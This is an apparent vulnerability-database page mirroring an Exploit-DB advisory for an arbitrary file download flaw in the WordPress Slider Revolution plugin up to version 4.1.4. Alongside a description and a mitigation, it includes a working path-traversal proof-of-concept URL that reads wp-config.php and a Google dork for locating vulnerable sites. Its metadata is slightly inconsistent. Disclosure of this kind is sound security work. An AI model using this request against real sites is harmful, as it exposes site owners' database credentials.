header-logo
Suggest Exploit
vendor:
Slider Revolution Responsive WordPress Plugin
by:
Claudio Viviani
7.5
CVSS
HIGH
Arbitrary File Download
434
CWE
Product Name: Slider Revolution Responsive WordPress Plugin
Affected Version From: <= 4.1.4
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 / Mozilla Firefox, Linux / Mozilla Firefox
2014

WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. This can allow the attacker to download any file from the server.

Mitigation:

Update to the latest version of WordPress Slider Revolution Responsive.
Source

Exploit-DB raw data:

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability


######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################

Discovered By : Claudio Viviani

        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Navigation

Suggest Exploit

Services By CQR